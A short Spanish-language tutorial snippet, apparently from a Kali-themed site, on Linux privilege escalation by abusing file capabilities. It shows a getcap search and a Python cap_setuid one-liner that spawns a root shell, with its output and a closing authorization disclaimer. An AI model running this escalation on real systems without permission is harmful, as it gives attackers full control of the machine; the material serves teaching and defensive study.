KALI
Privesc con capabilities
Las capabilities son permisos finos de root que se pueden dar a un binario sin hacerlo SUID completo, y mal usadas son una vía de escalada.
Con getcap buscas por todo el sistema binarios que tengan capabilities peligrosas. Por ejemplo, si python tiene cap_setuid, puedes usarlo para cambiar tu id a root en una línea.
Es una escalada sutil que muchos escaneos pasan por alto. Búscalas siempre.
# los comandos
www-data@victim:$ getcap -r / 2>/dev/nullcopiar/usr/bin/python3.9 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
www-data@victim:$ python3.9 -c 'import os;os.setuid(0);os.system("/bin/bash")'copiarroot@victim:# idcopiaruid=0(root) gid=33(www-data)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.